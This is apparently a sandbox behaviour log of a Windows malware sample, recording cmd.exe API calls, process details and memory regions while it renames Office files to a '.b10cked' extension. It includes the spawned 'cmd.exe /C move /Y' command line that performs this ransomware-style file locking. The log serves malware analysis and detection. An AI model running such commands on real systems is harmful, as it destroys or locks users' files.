"c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.624] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f67c | out: lpFindFileData=0x24f67c) returned 0x2e09f8 [0158.624] FindClose (in: hFindFile=0x2e09f8 | out: hFindFile=0x2e09f8) returned 1 [0158.624] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f67c | out: lpFindFileData=0x24f67c) returned 0x2e09f8 [0158.624] FindClose (in: 
hFindFile=0x2e09f8 | out: hFindFile=0x2e09f8) returned 1 [0158.624] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f67c | out: lpFindFileData=0x24f67c) returned 0x2e09f8 [0158.624] FindClose (in: hFindFile=0x2e09f8 | out: hFindFile=0x2e09f8) returned 1 [0158.625] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0158.625] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0158.625] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0158.625] GetEnvironmentStringsW () returned 0x2e0218* [0158.625] FreeEnvironmentStringsW (penv=0x2e0218) returned 1 [0158.625] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.626] GetConsoleOutputCP () returned 0x1b5 [0158.626] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.626] GetUserDefaultLCID () returned 0x409 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fa40, cchData=128 | out: lpLCData="0") returned 2 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24fa40, cchData=128 | out: lpLCData="0") returned 2 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fa40, cchData=128 | out: lpLCData="1") returned 2 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0158.627] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0158.628] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0158.628] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0158.628] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0158.629] GetConsoleTitleW (in: lpConsoleTitle=0x2d0938, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.629] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.629] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0158.629] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0158.629] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0158.630] _wcsicmp (_String1="move", _String2=")") returned 68 [0158.630] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0158.630] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0158.630] _wcsicmp (_String1="IF", _String2="move") returned -4 [0158.630] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0158.630] _wcsicmp (_String1="REM", _String2="move") returned 5 [0158.630] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0158.641] GetConsoleTitleW (in: lpConsoleTitle=0x24f738, nSize=0x104 | out: 
lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0158.642] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0158.643] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0158.643] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0158.643] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0158.643] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0158.643] _wcsicmp (_String1="move", _String2="CD") returned 10 [0158.643] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0158.643] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0158.643] _wcsicmp (_String1="move", _String2="REN") returned -5 [0158.643] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0158.643] _wcsicmp (_String1="move", _String2="SET") returned -6 [0158.643] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0158.643] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0158.643] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0158.643] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0158.643] _wcsicmp (_String1="move", _String2="MD") returned 11 [0158.643] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0158.643] _wcsicmp (_String1="move", _String2="RD") returned -5 [0158.643] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0158.643] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0158.643] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0158.643] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0158.643] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0158.643] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0158.643] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0158.643] _wcsicmp (_String1="move", _String2="VER") returned -9 [0158.643] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0158.643] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0158.643] _wcsicmp (_String1="move", _String2="SETLOCAL") returned 
-6 [0158.643] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0158.643] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0158.644] _wcsicmp (_String1="move", _String2="START") returned -6 [0158.644] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0158.646] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0158.646] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0158.647] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.648] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0158.648] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f4f4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f4ec, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f4ec*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", 
_MaxCount=0x7) returned -11 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0158.648] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0158.649] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0158.649] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0158.649] _wcsicmp (_String1="PUBWZI~1.TRX", _String2=".") returned 66 [0158.650] _wcsicmp 
(_String1="PUBWZI~1.TRX", _String2="..") returned 66 [0158.650] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzi~1.trx")) returned 0x2020 [0158.650] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e1f28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0158.650] SetErrorMode (uMode=0x0) returned 0x0 [0158.650] SetErrorMode (uMode=0x1) returned 0x0 [0158.650] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", nBufferLength=0x104, lpBuffer=0x24ee7c, lpFilePart=0x24ee64 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", lpFilePart=0x24ee64*="PUBWZI~1.TRX") returned 0x3c [0158.650] SetErrorMode (uMode=0x0) returned 0x1 [0158.650] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036")) returned 0x2012 [0158.650] _wcsicmp (_String1="PUBWZI~1.TRX", _String2=".") returned 66 [0158.650] _wcsicmp (_String1="PUBWZI~1.TRX", _String2="..") returned 66 [0158.650] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzi~1.trx")) returned 0x2020 [0158.651] SetErrorMode (uMode=0x0) returned 0x0 [0158.651] SetErrorMode (uMode=0x1) returned 0x0 [0158.651] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", nBufferLength=0x104, lpBuffer=0x24f2f8, lpFilePart=0x24f090 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", lpFilePart=0x24f090*="PUBWZI~1.TRX") returned 0x3c [0158.651] SetErrorMode (uMode=0x0) returned 0x1 [0158.651] SetErrorMode (uMode=0x0) returned 0x0 [0158.651] SetErrorMode (uMode=0x1) returned 0x0 [0158.651] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24f500, lpFilePart=0x24f090 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked", lpFilePart=0x24f090*="PUBWZINT.REST.trx_dll.b10cked") returned 0x4d [0158.651] SetErrorMode (uMode=0x0) returned 0x1 [0158.651] SetLastError (dwErrCode=0x0) [0158.651] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzint.rest.trx_dll.b10cked")) returned 0xffffffff [0158.651] GetLastError () returned 0x2 [0158.651] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x24ea0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ea0c) returned 0x2e2138 [0158.651] FindNextFileW (in: hFindFile=0x2e2138, lpFindFileData=0x24ea0c | out: lpFindFileData=0x24ea0c) returned 0 [0158.652] GetLastError () returned 0x12 [0158.652] FindClose (in: hFindFile=0x2e2138 | out: hFindFile=0x2e2138) returned 1 [0158.653] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZI~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2e1cc8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1cc8) returned 0x2e2138 [0158.654] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24eca4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4d [0158.654] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x24eca4, lpFilePart=0x0 | out: 
lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll", lpFilePart=0x0) returned 0x45 [0158.654] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzint.rest.trx_dll")) returned 0x2020 [0158.654] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzint.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\PUBWZINT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\1036\\pubwzint.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0158.654] FindClose (in: hFindFile=0x2e2138 | out: hFindFile=0x2e2138) returned 1 [0158.654] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ec58 | out: _Buffer=" 1") returned 9 [0158.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.655] GetFileType (hFile=0x7) returned 0x2 [0158.655] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0158.655] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ebe4 | out: lpMode=0x24ebe4) returned 1 [0158.655] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.655] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ec18 | out: lpConsoleScreenBufferInfo=0x24ec18) returned 1 [0158.655] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0158.656] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ec58 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0158.656] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, 
lpNumberOfCharsWritten=0x24ec3c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ec3c*=0x1a) returned 1 [0158.672] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.672] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0158.673] _get_osfhandle (_FileHandle=1) returned 0x7 [0158.673] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0158.673] _get_osfhandle (_FileHandle=0) returned 0x3 [0158.673] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0158.673] SetConsoleInputExeNameW () returned 0x1 [0158.673] GetConsoleOutputCP () returned 0x1b5 [0158.673] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0158.673] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.673] exit (_Code=0) Process: id = "268" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0xf80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\SGRES.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 21913 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 21914 start_va = 0x30000 end_va = 0x33fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 21915 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 21916 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 21917 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 21918 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 21919 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 21920 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 21921 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 21922 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 21923 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 21924 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 21925 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 21926 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 21927 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 21928 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 21929 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 21930 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 21931 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 21932 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 21933 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 21934 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 21935 
start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 21936 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 21937 start_va = 0x410000 end_va = 0x4d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 21938 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 21939 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 21940 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 21941 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 21942 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 21943 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 21944 start_va = 0x4e0000 end_va = 0x5e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 21945 start_va = 0x5f0000 end_va = 0x11effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 21946 start_va = 0x11f0000 end_va = 0x1352fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000011f0000" filename = "" Thread: id = 331 os_tid = 0x8b0 [0158.719] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20ff4c | out: lpSystemTimeAsFileTime=0x20ff4c*(dwLowDateTime=0x98891b80, dwHighDateTime=0x1d440a9)) [0158.719] GetCurrentProcessId () returned 0xf80 [0158.719] GetCurrentThreadId () returned 0x8b0 [0158.719] GetTickCount () returned 0x308e5 [0158.719] QueryPerformanceCounter (in: lpPerformanceCount=0x20ff44 | out: lpPerformanceCount=0x20ff44*=21550845005) returned 1 [0158.720] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0158.720] __set_app_type (_Type=0x1) [0158.720] __p__fmode () returned 0x76b331f4 [0158.720] __p__commode () returned 0x76b331fc [0158.720] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0158.720] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0158.720] GetCurrentThreadId () returned 0x8b0 [0158.720] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8b0) returned 0x38 [0158.720] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0158.720] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0158.720] SetThreadUILanguage (LangId=0x0) returned 0x409 [0158.720] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0158.720] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fedc | out: phkResult=0x20fedc*=0x0) returned 0x2 [0158.721] VirtualQuery (in: lpAddress=0x20ff13, lpBuffer=0x20feac, dwLength=0x1c | out: lpBuffer=0x20feac*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0158.721] VirtualQuery (in: 
